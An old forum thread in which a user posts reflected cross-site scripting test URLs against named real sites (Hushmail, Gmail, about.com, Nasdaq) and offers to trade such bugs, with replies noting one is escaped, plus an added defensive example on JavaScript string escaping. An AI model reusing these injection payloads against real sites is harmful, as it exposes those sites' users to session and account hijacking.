Some XSS
Posted by: lobas
Date: December 14, 2006 05:35PM

Secure hushmail is not very secure
https://mailserver2.hushmail.com/hushmail/folderlist/showFolderListPane.php?PHPSESSID=hm002f84798748f13acefafeb6181dbba0%22%3E%3Cscript%3Ealert('VULNERABLE')%3C/script%3E

don't know what this is but it's some kind of loop within gmail

http://mail.google.com/mail/?&ik=%22%3E%3CBODY%20ONLOAD=alert('XSS')%3E&fs=1
think it also disables account after so often

http://search.about.com/fullsearch.htm?terms=%22%3E%3Cscript%3Ealert('VULNERABLE')%3C/script%3E

http://quotes.nasdaq.com/quote.dll?mode=stock&page=quick&symbol=c%22%3E%3Cscript%3Ealert('VULNERABLE')%3C/script%3E

Re: Some XSS
Posted by: maluc
Date: December 14, 2006 08:19PM

hrm.. the google one just throws me into an infinite redirect loop.. using firefox

-maluc

Re: Some XSS
Posted by: unsticky
Date: December 21, 2006 10:00PM

the google one won't work, it's escaped. look at the source

<html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"></head><script>D=(top.js&&top.js.init)?function(d){top.js.P(window,d)}:function(){};if(window==top){top.location="/mail/?ik\u003d%22%3E%3CBODY%20ONLOAD\u003dalert(\'XSS\')%3E&fs\u003d1";}</script><script><!--
D(["v","niftdo8tdmwu","9930dc54804b344a","35","1","10gyqhhmabuzq"]
);
D(["lgn"]);

//--></script><script>var loaded=true;D(['e',3,1166759982916]);</script>

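The escaping visible in the source quoted above, as an added example that is not part of the original post and is not Google's code: a value reflected into a single-quoted JavaScript string inside an inline script block is output-encoded so it cannot close the string or the script element. The function names, and the choice to also escape `<`, `>`, `"` and line terminators, are assumptions of this sketch; the sample values are taken from the URL in the thread.

```javascript
// Added example. escapeForJsString, renderRedirect and parseJsString are
// hypothetical names; this is a sketch of JS-string output encoding.

// Characters with a short backslash form.
const NAMED = { '\\': '\\\\', "'": "\\'", '"': '\\"', '\n': '\\n', '\r': '\\r' };

// Encode an untrusted value for a single-quoted JS string literal that is
// emitted inside an inline <script> block.
function escapeForJsString(value) {
  return String(value).replace(/[\\'"\n\r<>=\u2028\u2029]/g, (ch) => {
    if (NAMED[ch]) return NAMED[ch];
    // Everything else in the set becomes \uXXXX, e.g. "=" -> \u003d
    return '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

// Build the kind of frame-busting redirect seen in the quoted source.
function renderRedirect(query) {
  return "<script>if(window==top){top.location='/mail/?" +
    escapeForJsString(query) + "';}</script>";
}

// Evaluate the literal the way the JS parser would, to show that the
// escaped form decodes back to plain data and nothing else.
function parseJsString(literalBody) {
  return new Function("return '" + literalBody + "';")();
}

// Query string exactly as it appears in the thread's URL.
const reflected = "ik=%22%3E%3CBODY%20ONLOAD=alert('XSS')%3E&fs=1";
// The same ik value after URL decoding, the harder case for the encoder.
const decoded = decodeURIComponent("%22%3E%3CBODY%20ONLOAD=alert('XSS')%3E");

console.log(escapeForJsString(reflected));
console.log(renderRedirect(decoded));
console.log(parseJsString(escapeForJsString(decoded)) === decoded);
```

The first line printed is the same string that appears after `/mail/?` in the quoted response, which is why the browser treats it as part of a URL rather than as markup.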
Re: Some XSS
Posted by: lobas
Date: January 10, 2007 09:40AM

I'm looking for XSS with google or some kind of bug, I'll trade some XSS for it :P
